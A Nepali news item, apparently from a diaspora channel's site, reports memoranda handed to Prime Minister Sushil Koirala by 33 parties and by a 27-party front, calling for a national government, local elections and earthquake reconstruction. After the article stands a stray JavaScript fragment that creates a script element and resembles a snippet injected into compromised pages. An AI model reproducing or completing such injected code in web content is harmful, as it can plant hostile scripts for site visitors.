ज्ञापन पत्र

Naresh Ale Avatar

संविधानसभाको निर्वाचनमा सहभागी नभएका र संविधानसभामा प्रतिनिधित्व नभएका ३३ दलले बिभिन्न बिभिन्न २१ बूँदे ज्ञापन पत्र प्रधानमन्त्री सुशील कोईरालालाई बुझाएका छन्। आईतबार प्रधानमन्त्री निबास बालुवाटारमा ज्ञापन पत्र बुझाउदै उनीहरुले राष्ट्रिय सरकारको गठन सहित स्थानिय निकायको निर्वाचन,प्रभावकारी राहत वितरण,उपयुक्त पुनस्थापना र पुनिर्माण नीति र कार्यक्रम ल्याउनुपर्नेमा जोड दिएका थिए।

त्यस्तै ज्ञापन पत्रमा भूकम्पबाट क्षति भएका सार्वजनिक विद्यालय,स्वास्थ्य संस्था,सार्वजनिक भवन,सडक र व्यक्तिगत भवनहरुको निर्माण कार्यलाई सुव्यवस्थित ढंगले छिटो गर्नुपर्ने जस्ता विषयहरु समेटिएका छन। ज्ञापन पत्र बुझदै प्रधानमन्त्री कोईरालाले प्राकृतिक विपद्ले जन धनको ठूलो नोक्सान भए पनि सबै नेपाली एकताबद्ध भएमा यसलाई विकासको नयाँ युगको शुरुआतमा बदल्न सकिने संभावना पनि औल्याउनु भयो। उहाँले हालैको भूकम्पले गरेको विनास ठूलो चुनौति भएको उल्लेख गर्दै राष्ट्रियता लोकतन्त्र र विकासको निम्ति एक भए। लाग्नुपर्ने बताउनुभयो।

त्यस्तै आईतबार नै २७ दलिय राष्ट्रवादी मोर्चाका तर्फबाट पनि प्रधानमन्त्री कोइरालालाई ज्ञापनपत्र बुझाइएको छ। ज्ञापन पत्रमा राहत वितरणलाई समानुपातिक र न्यायोचित बनाउने,सर्वदलीय राष्ट्रिय सरकारको गठन गर्ने, भूकम्प प्रभावित क्षेत्रमा पुनस्थापना र पुनिर्माणको कार्यक्रमलाई व्यवस्थित,सुरक्षित र बैज्ञानिक तवरले सञ्चालन गर्नुपर्ने विषयहरु समेटिएका छन।

var d=document;var s=d.createElement(‘script’);

admin Avatar
About Gurkha Channel

Gurkha channel is the sister company of Gurkha TV and the first 24-hour Nepali channel operating from the international capital of the world,London, United Kingdom. Gurkha Channels believes in honesty, respect, and unity. We belong to the land of Lord Buddha, Mt. Everest, and gallant people who sacrifice their lives for peace and humanity. Therefore, in this world of globalization, it is our effort to bring all Nepalese from around the world together and make one family: one Nation.

Search
Cateegories